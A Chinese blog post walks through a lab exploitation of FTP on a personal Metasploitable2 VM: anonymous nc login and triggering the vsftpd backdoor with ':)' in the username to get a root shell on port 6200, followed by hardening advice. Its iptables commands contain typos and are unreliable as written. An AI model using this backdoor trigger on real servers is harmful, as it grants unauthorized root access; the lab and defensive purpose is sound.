• 漏洞利用-FTP漏洞利用


    一、环境说明

    目标IP: 本人虚拟机 192.168.80.134 ,使用 metasploit2

    攻击IP: 本人虚拟机 192.168.80.129 ,使用 kali

    二、匿名用户登录

    root@kali:~# nc 192.168.80.134 21

    USER anonymous
    331 Please specify the password.
    PASS 123   #密码任意

    HELP  可以成功登录

    三、FTP 后门漏洞

    vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。

    默认6200端口并未开放

    root@kali:~# nmap -p 6200 192.168.80.134
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 09:15 CST
    Nmap scan report for 192.168.80.134
    Host is up (0.00098s latency).

    PORT STATE SERVICE
    6200/tcp closed lm-x

    打开另一个终端窗口,现在6200已被触发打开,并且登录该端口已经是root并且不需要密码,值得注意的是,默认FTP有个TIMEOUT时间

    四、FTP漏洞加固

    1、修改配置文件,禁止匿名用户登录。

    2、对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口。
    iptables -A INPUT -p tcp -dport 6200 -j DROP
    iptabels -A OUTPUT -p tcp sport 6200 -j DROP

  • 相关阅读:
    #Responsive# 响应式图片//www.w3cplus.com/blog/tags/509.html 整个系列完结。
    用js实现帧动画
    js判断对象是否存在
    canvas
    函数的四种调用模式
    递归真的好难啊!!! 看完之后好多了
    词法作用域
    变量名提升
    ajax调用后台Java
    左图又文字自适应
  • 原文地址:https://www.cnblogs.com/micfox/p/11149295.html
Copyright © 2020-2023  润新知